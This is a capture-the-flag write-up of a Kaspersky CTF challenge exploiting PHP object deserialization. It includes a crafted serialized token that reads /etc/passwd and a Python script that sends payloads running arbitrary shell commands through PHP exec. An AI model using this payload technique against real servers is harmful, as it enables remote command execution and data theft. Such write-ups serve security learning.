In this question, we were given an URL “http://expression.2018.ctf.kaspersky.com/” and we were asked to be find the flag from that URL.
When I opened that website on Firefox this page welcomed me.
I tried some XSS and some SQL-injection payloads but I thought I was going into the rabbit hole. After some time my teammates suggested that try to divide 1 by 0. Then I did that (:
After that error, I started to playing with the token. It was kind a base64 encoded json data.
O:10:"Expression":3:{s:14:"Expressionop";s:3:"div";s:18:"Expressionparams";a:2:{i:0;d:1;i:1;d:0;}s:9:"stringify";s:5:"1 / 0";}
I realized that this question is about PHP serialization stuff. I did some search on Google and I read an article about that topic[1]. Then I tried to execute a command by just changing some parts of that json data.
Expressionop: This calls a function by the function’s name.
Expressionparams: This is the parameters of the function that we call.
After I understood above, I crafted the json data below to test if that serialization/deserialization thing work. If this works then the server should return the content of the server’s /etc/passwd file. Because I used a PHP function called file_get_contents and passed the filename which is /etc/passwd as an argument.
O:10:"Expression":3:{s:14:"Expressionop";s:17:"file_get_contents";s:18:"Expressionparams";s:11:"/etc/passwd";s:9:"stringify";s:4:"TEST";}
Then encoded that data by using base64 and sent it back to the server by using its Share it link. And our test url was http://expression.2018.ctf.kaspersky.com/?action=load&token=TzoxMDoiRXhwcmVzc2lvbiI6Mzp7czoxNDoiAEV4cHJlc3Npb24Ab3AiO3M6MTc6ImZpbGVfZ2V0X2NvbnRlbnRzIjtzOjE4OiIARXhwcmVzc2lvbgBwYXJhbXMiO3M6MTE6Ii9ldGMvcGFzc3dkIjtzOjk6InN0cmluZ2lmeSI7czo0OiJURVNUIjt9. When I opened it on my Firefox I saw it was working.
To find the flag quickly, I needed to get rid of these four steps: change something in json -> encode it > send it > analyze its results. Therefore, I wrote a small python shell to achieve these steps automatically. This time I used exec function from PHP and its argument was expected to be an OS command. (btw pls don’t judge me for this script)
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# License : MIT
# Author : Mustafa ÇALAP
# Date : 23.11.2018
# Last Modified Date: 23.11.2018
from base64 import b64encode, b64decode
import requests
import re
while True:
url = 'http://expression.2018.ctf.kaspersky.com/?action=load&token='
php_func = 'exec'
func_param = input('Command: ')
if func_param == "":
func_param = 'ls -la'
func_param = func_param + ' | base64'
payload = 'O:10:"Expression":3:{s:14:"'.encode() + b'\x00' + 'Expression'.encode() + b'\x00' + 'op";s:'.encode() + str(len(php_func)).encode() + ':"'.encode() + php_func.encode() + '";s:18:"'.encode() + b'\x00' + 'Expression'.encode() + b'\x00' + 'params";s:'.encode() + str(len(func_param)).encode() + ':"'.encode() + func_param.encode() + '";s:9:"stringify";s:4:"TEST";}'.encode()
token = b64encode(payload)
final = url + token.decode()
session = requests.Session()
req = session.get(final)
res = re.findall('<pre>(.*)</pre>',req.text, flags=re.DOTALL)
print('='*20 + 'URL' + '='*20)
print(final)
print('='*20 + 'RESULT' + '='*20)
print(b64decode(res[0][7:]).decode())
I list the root directory of the server and I saw the file fl4g_h4r3 then read it and got the point.
I believe this was the easiest challenge because it was the only challenge that I could manage to solve (:
Reference: